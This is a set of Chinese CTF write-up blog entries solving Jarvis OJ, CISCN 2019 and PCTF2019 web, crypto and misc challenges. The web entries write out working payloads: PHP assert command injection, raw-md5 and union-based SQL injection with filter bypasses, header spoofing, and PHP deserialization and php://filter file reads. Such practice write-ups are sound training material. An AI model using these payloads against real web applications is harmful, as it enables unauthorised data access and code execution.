. ','t')===system('cat templates/flag.php');// . ".php"', '..') === false")#前面两边永真，后面注释掉，perfect! 不过返回Detected hacking attempt!,查源码 12345&lt;?php// TODO//$FLAG = '61dctf&#123;8e_careful_when_us1ng_ass4rt&#125;';?&gt;Detected hacking attempt! [61dctf]babyxss题目入口：http://web.jarvisoj.com:32800/123Hint1: csp bypassHint1: 最近问机器人有没有挂掉的人很多，这里解释一下，机器人是用系统的corntab起的，除非题目一起挂了，不然机器人是不会挂的，如果题目可以正常访问但是做不出来请检查自己的payload，不要让我再重复回答机器人挂没挂这个问题了。 一个提交框，主要是verify不知道 ( PS：substr($verify,0,4) === ‘5e51’ ) 以上为样式，每次都会变，下面直接爆破 123456789101112131415# -*- coding:utf-8 -*-import hashlibstr='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'for a in range(len(str)): for b in range(len(str)): for c in range(len(str)): for d in range(len(str)): mingwen=str[a]+str[b]+str[c]+str[d] flag=hashlib.md5() flag.update(mingwen) md5=flag.hexdigest() if md5[:4]=='5e51': print mingwen exit() 成功提交 Admin has got your secret and will read it soon. 这题真的试了很多payload都不行，vps也收不到referer的信息，真的怀疑环境问题 不是自己菜吗？ 下面直接贴大佬WP 总结一边查资料一边做题总算把这个平台的web搞掂，不会做的再看看WP，虽然可能会偷懒233，尽管不完全是独自做出来的，但还是收获不少知识，掌握不少姿势]]></content>
      <categories>
        <category>平台训练</category>
      </categories>
      <tags>
        <tag>Web</tag>
        <tag>SQL</tag>
        <tag>审计</tag>
        <tag>命令执行</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[强网杯部分WP及Jarvis OJ(一)]]></title>
    <url>%2F2019%2F09%2F11%2F%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%83%A8%E5%88%86WP%E5%8F%8AJarvis%20OJ(%E4%B8%80)%2F</url>
    <content type="text"><![CDATA[前言我还是太懒了，已经半年没更新博客，跟个废人一样。这个学期要振作起来！ 前天刚打完广东的强网杯，开始打时，醒来已经12多点，队友都差不多AK完了web,本菜鸡就只能玩了下MISC，然后就去摸鱼了，下面附上队友大腿的WP2019广东省强网杯writeup 另外：舍友安利了一个不错的CTF平台，趁这段时间课少，刷些基础题来提升一下，记录这段时间web狗的学习过程 PORT51题目入口：http://web.jarvisoj.com:32770/ 点击页面看到如下 Please use port 51 to visit this site. 以为用51端口访问，可是网页已经用了32770，改了之后访问不了的 12单纯的我以为这样:http://web.jarvisoj.com:51/ 后来才知道是本地51端口访问,使用curl命令 12curl --local-port 51 http://web.jarvisoj.com:32770/#PCTF&#123;X_F0rw4rd_F0R_is_not_s3cuRe&#125; LOCALHOST题目入口：http://web.jarvisoj.com:32774/1localhost access only!! X-Forwarded-For 127.0.0.1 PCTF{X_F0rw4rd_F0R_is_not_s3cuRe} Login题目入口：http://web.jarvisoj.com:32772/1需要密码才能获得flag哦。 进入看到一个提交密码的输入框 随便输入字符(包括非法字符)都只返回Wrong Password. 查看response发现 1hint:"select * from `admin` where password='".md5($pass,true)."'" 关键在于md5($pass,true) 1234567891011md5(string,raw)string 必需。规定要计算的字符串。 raw 可选。规定十六进制或二进制输出格式： • TRUE – 原始 16 字符二进制格式• FALSE – 默认。32 字符十六进制数如果md5计算后的值经过hex转成字符串后为 ”or’xxx’这样的字符串,则拼接后构成的语句为：select * from `admin` where password=”or’xxx’ 所以我们要找一个字符串使得md5()后再decode(‘hex’)得到有’ 下面提供两个payload1234567891011content: 129581926211651571912466741651878684928 hex: 06da5430449f8f6f23dfc1276f722738 raw: ?T0D??o#??’or’8.N=?content: ffifdyop hex: 276f722736c95d99e921722cf9ed621c raw: ‘or’6蒥欓!r,b 参考资料 最后密码输入ffifdyop PCTF{R4w_md5_is_d4ng3rous} 神盾局的秘密题目入口：http://web.jarvisoj.com:32768/1这里有个通向神盾局内部网络的秘密入口，你能通过漏洞发现神盾局的秘密吗？ 刷新页面时F12在Network中看到showimg.php?img=c2hpZWxkLmpwZw== 123456789以下为后面所用到的信息&gt;&gt;&gt; 'c2hpZWxkLmpwZw=='.decode('base64')'shield.jpg'&gt;&gt;&gt; 'showimg.php'.encode('base64')'c2hvd2ltZy5waHA=\n'&gt;&gt;&gt; 'index.php'.encode('base64')'aW5kZXgucGhw\n'&gt;&gt;&gt; 'shield.php'.encode('base64')'c2hpZWxkLnBocA==\n' 读取showing.php内容:/showimg.php?img=c2hvd2ltZy5waHA= 123456789101112&lt;?php $f = $_GET['img']; if (!empty($f)) &#123; $f = base64_decode($f); if (stripos($f,'..')===FALSE &amp;&amp; stripos($f,'/')===FALSE &amp;&amp; stripos($f,'\\')===FALSE &amp;&amp; stripos($f,'pctf')===FALSE) &#123; readfile($f); &#125; else &#123; echo "File not found!"; &#125; &#125;?&gt; 没发现关于flag内容，读取index.php内容:/showimg.php?img=aW5kZXgucGhw 12345678&lt;!--?php require_once('shield.php'); $x = new Shield(); isset($_GET['class']) &amp;&amp; $g = $_GET['class']; if (!empty($g)) &#123; $x = unserialize($g); &#125; echo $x---&gt; index.php也没有出现与Flag相关的信息，但是index.php读取的class参数的值，并且没有对参数进行过滤 读取shield.php内容,/showimg.php?img=c2hpZWxkLnBocA== 12345678910111213141516&lt;?php //flag is in pctf.php class Shield &#123; public $file; function __construct($filename = '') &#123; $this -&gt; file = $filename; &#125; function readfile() &#123; if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,'..')===FALSE &amp;&amp; stripos($this-&gt;file,'/')===FALSE &amp;&amp; stripos($this-&gt;file,'\\')==FALSE) &#123; return @file_get_contents($this-&gt;file); &#125; &#125; &#125;?&gt; 可以看到flag在pctf.php中,但做了过滤无法直接读取,考虑到index.php做了反序列化操作,并且在进行初始化的时候，将$filename赋值为pctf.php 123function __construct($filename = 'pctf.php') &#123; $this -&gt; file = $filename;&#125; 构造序列化 12345678910111213141516class Shield &#123; public $file; function __construct($filename = 'pctf.php') &#123; $this -&gt; file = $filename; &#125; function readfile() &#123; if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,'..')===FALSE &amp;&amp; stripos($this-&gt;file,'/')===FALSE &amp;&amp; stripos($this-&gt;file,'\\')==FALSE) &#123; return @file_get_contents($this-&gt;file); &#125; &#125; &#125;$x = new Shield();echo serialize($x);#O:6:"Shield":1:&#123;s:4:"file";s:8:"pctf.php";&#125; 最终payload 1234567http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:&#123;s:4:%22file%22;s:8:%22pctf.php%22;&#125;&lt;!--?php //Ture Flag : PCTF&#123;W3lcome_To_Shi3ld_secret_Ar3a&#125; //Fake flag: echo "FLAG: PCTF&#123;I_4m_not_fl4g&#125;"?--&gt; IN A MESS题目入口：http://web.jarvisoj.com:32780/ 连出题人自己都忘了flag放哪了，只记得好像很混乱的样子。 查源码发现index.phps 123456789101112131415161718192021222324252627&lt;?phperror_reporting(0);echo "&lt;!--index.phps--&gt;";if(!$_GET['id'])&#123; header('Location: index.php?id=1'); exit();&#125;$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];if(stripos($a,'.'))&#123; echo 'Hahahahahaha'; return ;&#125;$data = @file_get_contents($a,'r');if($data=="1112 is a nice lab!" and $id==0 and strlen($b)&gt;5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)&#123; require("flag.txt");&#125;else&#123; print "work harder!harder!harder!";&#125;?&gt; 下面构造payload 123456id可以用弱类型来解决 id=0beregi函数可以用%00截断 b=%0011111难点在于a,可用php://input,然后post数据1112 is a nice lab!也可以data协议a=data:,1112 is a nice lab!#返回： Come ON!!! &#123;/^HT2mCpcvOLf&#125; 然而这并不像flag,而是路径，访问之自动跳到http://web.jarvisoj.com:32780/%5EHT2mCpcvOLf/index.php?id=1 回显:hi666 更改id发现 1234id=2回显:SELECT * FROM content WHERE id=2id=1'or'1'='1 #回显:you bad boy/girl! 明显的sql注入了,而且过滤了很多关键字和空格，尝试用双写和/*1*/代替 12345678910111213141516id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1#id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2#id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,3#到这回显3，说明有3个字段查库:id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,database()#回显:test查表:id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,(seselectlect/*1*/group_concat(table_name)/*1*/frfromom/*1*/information_schema.tables/*1*/where/*1*/table_schema=database())%23回显:content查列:-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,(seselectlect/*1*/group_concat(column_name)/*1*/frfromom/*1*/information_schema.columns/*1*/where/*1*/table_name=0x636f6e74656e74)%23回显:id,context,title查内容:id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,(seselectlect/*1*/context/*1*/frfromom/*1*/content)%23回显:PCTF&#123;Fin4lly_U_got_i7_C0ngRatulation5&#125; RE? 咦，奇怪，说好的WEB题呢，怎么成逆向了？不过里面有个help_me函数挺有意思的哦 这道题完全复现别人的，挺有意思的，没有链接，只给了一个文件udf.so.02f8981200697e5eeb661e64797fc172 关于UDF的介绍 1234567UDF是mysql的一个拓展接口，UDF（Userdefined function）可翻译为用户自定义函数，这个是用来拓展Mysql的技术手段。简单来说，udf是为了拓展功能而可以自行添加函数，不过添加的函数为恶意函数就能导致代码执行。OK，返回题目，题目给出的提示是“不过里面有个help_me函数挺有意思的哦”，那就是说这里需要创建自定义函数了。创建自定义函数的语法：create function 函数名 returns string soname ‘导出的DLL路径’； 在Ubuntu上下载文件 1wget https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172 拷贝至/usr/lib/mysql/plugin,然后启动mysql服务并登陆 12service mysql startmysql -u root -p 创建题目提示的自定义函数并访问 123456789101112131415161718192021222324252627mysql&gt; use mysql;Reading table information for completion of table and column namesYou can turn off this feature to get a quicker startup with -ADatabase changedmysql&gt; create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';ERROR 1125 (HY000): Function 'help_me' already existsmysql&gt; select help_me();+---------------------------------------------+| help_me() |+---------------------------------------------+| use getflag function to obtain your flag!! |+---------------------------------------------+1 row in set (0.00 sec)mysql&gt; create function getflag returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';Query OK, 0 rows affected (0.00 sec)mysql&gt; select getflag();+------------------------------------------+| getflag() |+------------------------------------------+| PCTF&#123;Interesting_U5er_d3fined_Function&#125; |+------------------------------------------+1 row in set (0.00 sec) end今天就写到这把，题目不难，很基础算开学初找下手感把。其实还是太累了不想做啊]]></content>
      <categories>
        <category>平台训练</category>
      </categories>
      <tags>
        <tag>CTF</tag>
        <tag>Web</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[国赛2019初赛部分WP]]></title>
    <url>%2F2019%2F04%2F22%2F%E5%9B%BD%E8%B5%9B2019%E5%88%9D%E8%B5%9B%E9%83%A8%E5%88%86WP%2F</url>
    <content type="text"><![CDATA[WebJustSoso ?file=php://filter/read=convert.base64-encode/resource=hint.php 1234567891011121314151617181920212223242526272829303132333435363738&lt;?php class Handle&#123; private $handle; public function __wakeup()&#123; foreach(get_object_vars($this) as $k =&gt; $v) &#123; $this-&gt;$k = null; &#125; echo "Waking up\n"; &#125; public function __construct($handle) &#123; $this-&gt;handle = $handle; &#125; public function __destruct()&#123; $this-&gt;handle-&gt;getFlag(); &#125;&#125;class Flag&#123; public $file; public $token; public $token_flag; function __construct($file)&#123; $this-&gt;file = $file; $this-&gt;token_flag = $this-&gt;token = md5(rand(1,10000)); &#125; public function getFlag()&#123; $this-&gt;token_flag = md5(rand(1,10000)); if($this-&gt;token === $this-&gt;token_flag) &#123; if(isset($this-&gt;file))&#123; echo @highlight_file($this-&gt;file,true); &#125; &#125; &#125;&#125;?&gt;2+,ing ?file=php://filter/read=convert.base64-encode/resource=index.php 1234567891011121314151617181920212223242526272829&lt;html&gt;&lt;?phperror_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"];if(!isset($file))&#123; echo 'Missing parameter'.'&lt;br&gt;';&#125;if(preg_match("/flag/",$file))&#123; die('hack attacked!!!');&#125;@include($file);if(isset($payload))&#123; $url = parse_url($_SERVER['REQUEST_URI']); parse_str($url['query'],$query); foreach($query as $value)&#123; if (preg_match("/flag/",$value)) &#123; die('stop hacking!'); exit(); &#125; &#125; $payload = unserialize($payload);&#125;else&#123; echo "Missing parameters"; &#125; ?&gt;&lt;!--Please test index.php?file=xxx.php --&gt;&lt;!--Please get the source of hint.php--&gt;&lt;/html&gt;2+,ing payload这里执行了反序列操作，file变量填入hint.php将类文件导入进来，这里我们需要绕过parse_url，例如http://127.0.0.1///index.php 即可绕过从而执行payload 这里还有一个地方需要绕过： $this-&gt;token === $this-&gt;token_flag 这里使用指针将其指为一个地址即可 构造payload 1234567891011121314151617181920212223242526272829303132&lt;?phpclass Handle&#123; private $handle; public function __construct($handle) &#123; $this-&gt;handle = $handle; &#125; public function __destruct()&#123; $this-&gt;handle-&gt;getFlag(); &#125;&#125;class Flag&#123; public $file; function __construct($file)&#123; $this-&gt;file = $file; &#125; public function getFlag()&#123; if(isset($this-&gt;file))&#123; echo @highlight_file($this-&gt;file,true); &#125; &#125;&#125;$flag = new Flag('flag.php');$flag -&gt;token = &amp;$flag -&gt; token_flag;$exp = new Handle($flag);echo urlencode(serialize($exp)).PHP_EOL;//O%3A6%3A%22Handle%22%3A1%3A%7Bs%3A14%3A%22%00Handle%00handle%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A10%3A%22token_flag%22%3BN%3Bs%3A5%3A%22token%22%3BR%3A4%3B%7D%7D 还有一个地方需要绕过，绕过wakeup函数，实际上是1，我们将变量改为大于1即可绕过 Cryptopuzzlesquestion 01234a1:0xfa6a2:0xbeda3:0x9c7a4:0xa00 question 1 26364809 Part1 26366033 26366621 看到这三个数都是素数，猜想part1也可能是素数(并且相隔37)。google到如下的素数表12part1=26365399hex(26365399)=0x1924dd7 hex question 2 没什么好说的，极限和定积分在线求解12part2=(1+91+7+1)*77=7700hex(7700)=0x1e14 question 3 part3=0x48d0 question 4 part4=hex(336pi*120/pi=40320)=0x9d806 warmup 本题个是aes-ctr加密，但在同一次通信中其中的key和计数器不变,所以明文异或的密钥不会变. 所以需要在通信过程可以通过输入不同的填充获得密钥 AES_CTR 就是对明文分组做异或 输入：11111111111111111111111111111111111111111111111111111 (48+5 = 53个重复),得到密文分为6组分别为part1~part6 输入：11111 (5个重复),得到密文分为6组分别为No.1~No.3 代入即可求解1234567891011121314151617181920s1=["part1","part2","part3","part4","part5","part6"]s2=["NO.1","NO.2","NO.3"]ming="11111111111111111111111111111111111111111111111111111"minghex=ming.encode("hex")print minghexkey1=int(s1[0],16)^int(minghex,16)key2=int(s1[1],16)^int(minghex,16)key3=int(s1[2],16)^int(minghex,16)minghex0=int(s2[0],16)^key1minghex1=int(s2[1],16)^key2minghex2=int(s2[2],16)^key3print len(hex(key1))print len(hex(key2))print len(hex(key3))print hex(minghex0)print hex(minghex1)print hex(minghex2)print hex(minghex0)[2:-1].decode("hex")print hex(minghex1)[2:-1].decode("hex")print hex(minghex2)[2:-1].decode("hex") Asymmetric 没什么好讲的，就一RSA的基本解法12345678910111213import gmpy2N=754600786340927688096652328072061561501667781193760284816393637647032362908189628005150802929636396969230958922073774180726205402897453096041624408154494621307262657492560975357997726055874834308239749992507552325614973631556754707427580134609221878324704469965450463088892083264951442562525825243127575048386573246756312509362222667015490013299327398464802116909245529065994770788125182846841016932803939806558559335886481214931253578226314057242462834149031625361286317307273138514126289052003214703248070256059405676891634792175775697355408418965738663732479622148276007308404691800186837579126431484536836513358124181380166971922188839934522356902295160649189850427580493328509329115798694580347461641487270793993129066433242544366683131231903590153844590595882428219010673818765995719694470668924781499987923250883546686344997580959954960334567874040563037167422839228466141912000421309282727363913908613116739074234989825489075148091144771967111113068647060175231126374070143480727000247378471525286907200601035581143391602569836131345909055708005758380081303860198696570649330092070410465978479841469533490522594827330661914537170063053059393550673731195548189192109328158876774080143171304333338291909598353550442855717204721e=58134567416061346246424950552806959952164141873988197038339318172373514096258823300468791726051378264715940131129676561677588167620420173326653609778206847514019727947838555201787320799426605222230914672691109516799571428125187628867529996213312357571123877040878478311539048041218856094075106182505973331343540958942283689866478426396304208219428741602335233702611371265705949787097256178588070830596507292566654989658768800621743910199053418976671932555647943277486556407963532026611905155927444039372549162858720397597240249353233285982136361681173207583516599418613398071006829129512801831381836656333723750840780538831405624097443916290334296178873601780814920445215584052641885068719189673672829046322594471259980936592601952663772403134088200800288081609498310963150240614179242069838645027877593821748402909503021034768609296854733774416318828225610461884703369969948788082261611019699410587591866516317251057371710851269512597271573573054094547368524415495010346641070440768673619729280827372954003276250541274122907588219152496998450489865181536173702554116251973661212376735405818115479880334020160352217975358655472929210184877839964775337545502851880977049299029101466287659419446724781305689536816523774995178046989696610897508786776845460908137698543091418571263630383061605011820139755322231913029643701770497299157169690586232187419462594477116374977216427311975598620616618808494138669546120288334682865354702356192972496556372279363023366842805886601834278434406709218165445335977049796015123909789363819484954615665668979phi=165740755190793304655854506052794072378181046252118367693457385632818329041540419488625472007710062128632942664366383551452498541560538744582922713808611320176770401587674618121885719953831122487280978418110380597358747915420928053860076414097300832349400288770613227105348835005596365488460445438176193451867**4-165740755190793304655854506052794072378181046252118367693457385632818329041540419488625472007710062128632942664366383551452498541560538744582922713808611320176770401587674618121885719953831122487280978418110380597358747915420928053860076414097300832349400288770613227105348835005596365488460445438176193451867**3d=gmpy2.invert(e,phi)c=397664589731174185244807196969081295636743791347632992634877550171968202027583158122965358524605148382084087083055292775614950985582170471137600161892882032418551412966830769759927895880547815633951497722234770712306297076112879370771232002533504544337602525761984751743331880661186125346775270009628518533444304138475743540761869803954394981015216901027389649277312518044879870118578221153501921121767735420588646590238714924432821796920521634258142397614044689209502427096357648434975129259602082825127577076206003397304427079424477492861403400315663250325072548968845681025152851701569515687341859140204177488152275522562157702438579218042125793735027062228793066059121344460139665832155539640935735205492779952978907816559262061499244528361109871020021430760020031419798283808270133071565808900320433503202909269829912391264709602543303699123003147709062800113790217663557468058878220523200876377904766404202224175582491708673210826668402867922460431914279888880230599188839367957343839752438896262332473564984706656652754054197747324605372489970688044871961691577273950534597267097030840338786892644592482975063818909397183558108598420167691316258539257369739732052074157931998072754050437812781241004016365131849522113541913181print hex(pow(c,d,N))[2:].decode('hex') Miscsaleae 需要安装saleae logic工具然后导入文件 一上一下为0，同上为1,和异或的思想一样。 123456789101112131415161718192021222324252627282930313233343536373839404142011001100110110001100001 011001110111101100110001001100100011000000110111001100010011001100111001001101110010110100110001001110010110010000110001001011010011010000111000011001010011011000101101011000100110010100111000011000110010110100110111001110000011010001100010001110000011100101100001001110010011010101100101001100000011011101111101 二进制转字符即可 24C saleae logic导入文件 选择I2C协议导出12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849Time [s],Packet ID,Address,Data,Read/Write,ACK/NAK0.843872000000000,0,'160',' ',Write,ACK0.844038500000000,0,'160',f,Write,ACK0.844205000000000,0,'160',1,Write,ACK0.844371000000000,0,'160',6,Write,ACK0.844537500000000,0,'160',3,Write,ACK0.844704000000000,0,'160',b,Write,ACK0.844870500000000,0,'160',d,Write,ACK0.845036500000000,0,'160',f,Write,ACK0.845203000000000,0,'160',4,Write,ACK0.845369500000000,0,'160',e,Write,ACK0.845536000000000,0,'160',&#125;,Write,ACK0.845702500000000,0,'160','0',Write,ACK0.945962500000000,1,'160','0',Write,ACK0.946318000000000,2,'161',f,Read,ACK0.946481500000000,2,'161',l,Read,ACK0.946645000000000,2,'161',a,Read,ACK0.946808500000000,2,'161',g,Read,ACK0.946972000000000,2,'161',&#123;,Read,ACK0.947135500000000,2,'161',c,Read,ACK0.947299500000000,2,'161',4,Read,ACK0.947463000000000,2,'161',6,Read,ACK0.947626500000000,2,'161',d,Read,ACK0.947790000000000,2,'161',9,Read,ACK0.947953500000000,2,'161',e,Read,ACK0.948117500000000,2,'161',1,Read,ACK0.948281000000000,2,'161',0,Read,ACK0.948444500000000,2,'161',-,Read,ACK0.948608000000000,2,'161',e,Read,ACK0.948771500000000,2,'161',9,Read,ACK0.948935500000000,2,'161',b,Read,ACK0.949099000000000,2,'161',5,Read,ACK0.949262500000000,2,'161',-,Read,ACK0.949426000000000,2,'161',4,Read,ACK0.949589500000000,2,'161',d,Read,ACK0.949753000000000,2,'161',9,Read,ACK0.949917000000000,2,'161',0,Read,ACK0.950080500000000,2,'161',-,Read,ACK0.950244000000000,2,'161',a,Read,ACK0.950407500000000,2,'161',8,Read,ACK0.950571000000000,2,'161',8,Read,ACK0.950734500000000,2,'161',3,Read,ACK0.950898000000000,2,'161',-,Read,ACK0.951061500000000,2,'161',4,Read,ACK0.951225000000000,2,'161',1,Read,ACK0.951388500000000,2,'161',c,Read,NAK5.946647000000000,3,'160',\t,Write,ACK5.946813500000000,3,'160',a,Write,ACK5.946980000000000,3,'160',c,Write,ACK usbasp analyzer 选SPI 导出1234567891011121314151617181920212223242526272829303132333435363738394041424344Time [s],Packet ID,MOSI,MISO1.474939400000000,,f,'0'1.474945500000000,,l,'0'1.474951600000000,,a,'0'1.474957700000000,,g,'0'1.474963800000000,,&#123;,'0'1.474969900000000,,8,'0'1.474976000000000,,5,51.474982100000000,,b,'0'1.474988300000000,,0,'0'1.474994400000000,,8,'0'1.475000500000000,,4,'0'1.475006600000000,,c,'0'1.475012700000000,,6,61.475018800000000,,-,-1.475024900000000,,4,'0'1.475031100000000,,2,'0'1.475037200000000,,e,'0'1.475043300000000,,6,'0'1.475049400000000,,-,'0'1.475055500000000,,4,'0'1.475061600000000,,9,91.475067700000000,,5,'5'1.475073900000000,,c,'0'1.475080000000000,,-,'0'1.475086100000000,,8,'0'1.475092200000000,,7,'0'1.475098300000000,,b,'0'1.475104400000000,,4,01.475110500000000,,-,-1.475116600000000,,4,'4'1.475122800000000,,6,'0'1.475128900000000,,d,'0'1.475135000000000,,f,'0'1.475141100000000,,b,'0'1.475147200000000,,1,'0'1.475153300000000,,d,d1.475159400000000,,f,f1.475165500000000,,5,'1'1.475171700000000,,8,'0'1.475177800000000,,a,'0'1.475183900000000,,0,'0'1.475190000000000,,&#125;,'0'1.475196100000000,,'0','0']]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>Misc</tag>
        <tag>Web</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[RSA in polynomial]]></title>
    <url>%2F2019%2F04%2F16%2FRSA-in-polynomial%2F</url>
    <content type="text"><![CDATA[RSA in polynomial 题目给了三个文件如下 pubkey.py 123456from sage.all import GF, PolynomialRingP=PolynomialRing(GF(2),'x')e = 31337n = P('x^2048 + x^2046 + x^2043 + x^2040 + x^2036 + x^2035 + x^2034 + x^2033 + ... + x^7 + x^3 + 1# n很多这里就列几个表示一下 rsa.sage 123456789101112131415161718192021222324#!/usr/bin/env sage# coding=utf-8from pubkey import P, n, efrom secret import flagfrom os import urandomR.&lt;a&gt; = GF(2^2049)def encrypt(m): global n assert len(m) &lt;= 256 m_int = Integer(m.encode('hex'), 16) m_poly = P(R.fetch_int(m_int)) c_poly = pow(m_poly, e, n) c_int = R(c_poly).integer_representation() c = format(c_int, '0256x').decode('hex') return cif __name__ == '__main__': ptext = flag + os.urandom(256-len(flag)) ctext = encrypt(ptext) with open('flag.enc', 'wb') as f: f.write(ctext) flag.enc 这个就不多说了，乱码，最终要解的 作为学渣的我只会n是整数的时候~，然而n在这里是多项式,一开始连GF(有限域)都不知道是什么鬼，简直要了我的命,而且那个sage也不知道是哪个库，后来才发现是另外一个软件(支持python) 有限域上的不可约多项式RSA体制 所以这题关键还是分解多项式n最终求得d=p*q,在此之前先求s(这个 s 类似于一般 RSA 中的 n 的欧拉值（phi）) 在pubkey.py后加上print n.factor()可以得到分解式 然后求逆元d 123456&gt;&gt;&gt; import gmpy2&gt;&gt;&gt; s=(2**1227-1)*(2**821-1)&gt;&gt;&gt; e=31337&gt;&gt;&gt; d = invert(e,s)&gt;&gt;&gt; print d28371355076358206651880108899447906576372266284154280282347957145120170645734899523334978078067679493874344060469168599875633378810644150054152285167807343298071802254581411860744158353096011714907819564399402714709858337654437633205741705120012058022068404602368525225166892620782231104596296684392603977673442420869964883518757302131139464582403543008517510576759631853686083804876647805871645437996963908242523987920166730933950556409136138395339773872530985876082852299816804207673785130661047844641798164979597836577807048385040982943227701240014693785196556609759136982566512240594608088626862145862029373010104 有了d就可以写解密脚本了 123456789101112131415161718from sage.all import *from pubkey import P, n, edef decrypt(c,d): c_int = int(c.encode("hex"),16) c_poly = P(R.fetch_int(c_int)) m_poly = pow(c_poly, d, n) m_int = R(m_poly).integer_representation() m = format(m_int, '0256x').decode('hex') return mR.&lt;a&gt; = GF(2^2049)d = 28371355076358206651880108899447906576372266284154280282347957145120170645734899523334978078067679493874344060469168599875633378810644150054152285167807343298071802254581411860744158353096011714907819564399402714709858337654437633205741705120012058022068404602368525225166892620782231104596296684392603977673442420869964883518757302131139464582403543008517510576759631853686083804876647805871645437996963908242523987920166730933950556409136138395339773872530985876082852299816804207673785130661047844641798164979597836577807048385040982943227701240014693785196556609759136982566512240594608088626862145862029373010104f = open('../flag.enc', 'r')c = f.read()print decrypt(c,d)]]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>Crypto</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[PCTF2019-Writeup]]></title>
    <url>%2F2019%2F03%2F16%2FPCTF2019-Writeup%2F</url>
    <content type="text"><![CDATA[CryptographySpoiler Bran Stark, wants to convey an important information to the Sansa back at winterfell. He sends her a message. The message however, is encrypted though.Can you find out what Bran is trying to convey?? 题目给了一个key.pdf打开内容为 3a2c3a35152538272c2d213e332e3c25383030373a15 明明简单的一道题到头来做不出，后面发现脑洞还是不够强 winhex打开pdf看到文件尾后面有东西 提取出来刚好发现与米密文长度相同 6a6f6e736e6f776973647261676f6e62796269727468 xor一下123456a='3a2c3a35152538272c2d213e332e3c25383030373a15'b='6a6f6e736e6f776973647261676f6e62796269727468'flag=''for i in range(len(a)/2): flag+=chr(int(a[i*2:i*2+2],16)^int(b[i*2:i*2+2],16))print flag PCTF{JON_IS_TARGARYEN} The Order of the Phoenix1234567891011121314151617It's a new age Order of the Phoenix. The current members are:1.Harry2.Hermione3.Ron4.George5.Charlie6.Bill7.Ginny8.Fleur9.Luna10.NevilleEach of them has a secret QR code associated with him/her which is given to you. At the entrance of the Grimmauld place, is a system to scan their QR codes.Any 5 or more of them can enter at once, but not less than 5. This is in place to prevent any rash decisions made by very few people regarding the matters concerning the Order.However, now is an emergency time. Malfoy is causing trouble again, and Harry needs to enter Grimmauld Place for which he needs to know the secret associated with the entry system to let him in. Help him out. 题目给了10个人的二维码扫出来如下 12345678910Bill: a-424b493442128adbeef5ce33f18c6c5996cdd97e4922644a4479bb4e05f8846fCharlie: 8-1268bf4430c0b1a4c568a302da92421bc672aceb57fef3401f2434cfc3bf740bFleur: 9-b52781fd38b0185bd1a8a92a92dbf01c99eddbb50b86f65a882ad8a7fa313e9dGeorge: 6-7c61f3ee00ab759a6853f041e74ae2378144a96b662230888d6ba6412c646190Ginny: 7-d01f29e42de0ab1fb183a35d06a2ac6117acaad2b3017671846c7b380e83d6bbHarry: 1-d301da5536a5d8b8e2be50a7584127eb3704025f048cf72335f1b301b852b30aHermione: 2-e1af01e2f7887b63c068823cbcd812f91899678656456db71dfa9ab1fbb1bd26Luna: 4-510c9c8f6aaacebf16bb5fd9e2cd8c0845ec483bd49bf57fa4151e5b672c73b0Neville: 3-dc60d55a411ccfd4a44e6a9799774dd6207dffdfcab4b442075ead165fa7ecbRon: 5-bd4f58a846bb9e47a7402e22df13002aef3bf3048011674269eaff39154c62bf 然而不知道是干嘛的，完全没方向 看了hint Eleven scientists are working on a secret project…….? google一下不懂，但是github上找到方法传送门1234&gt;&gt;&gt; from secretsharing import PlaintextToHexSecretSharer&gt;&gt;&gt; flags=['1-d301da5536a5d8b8e2be50a7584127eb3704025f048cf72335f1b301b852b30a','2-e1af01e2f7887b63c068823cbcd812f91899678656456db71dfa9ab1fbb1bd26','3-dc60d55a411ccfd4a44e6a9799774dd6207dffdfcab4b442075ead165fa7ecb','4-510c9c8f6aaacebf16bb5fd9e2cd8c0845ec483bd49bf57fa4151e5b672c73b0','5-bd4f58a846bb9e47a7402e22df13002aef3bf3048011674269eaff39154c62bf','6-7c61f3ee00ab759a6853f041e74ae2378144a96b662230888d6ba6412c646190','7-d01f29e42de0ab1fb183a35d06a2ac6117acaad2b3017671846c7b380e83d6bb','8-1268bf4430c0b1a4c568a302da92421bc672aceb57fef3401f2434cfc3bf740b','9-b52781fd38b0185bd1a8a92a92dbf01c99eddbb50b86f65a882ad8a7fa313e9d','a-424b493442128adbeef5ce33f18c6c5996cdd97e4922644a4479bb4e05f8846f']&gt;&gt;&gt; PlaintextToHexSecretSharer.recover_secret(flags[0:10])'pctf&#123;sh4m1r3_w4s_4_gr34t_m4n&#125;\n' Help Rabin Rabin has received a text from someone special, but it’s all in ciphertext and he is unable to make head or tail of it. He requested her for a little hint, and she sent him the encryption algorithm. He’s still unable to decode the text. Not wanting to look dumb to her again, he needs your help in figuring out what she’s written for him. So help him out. 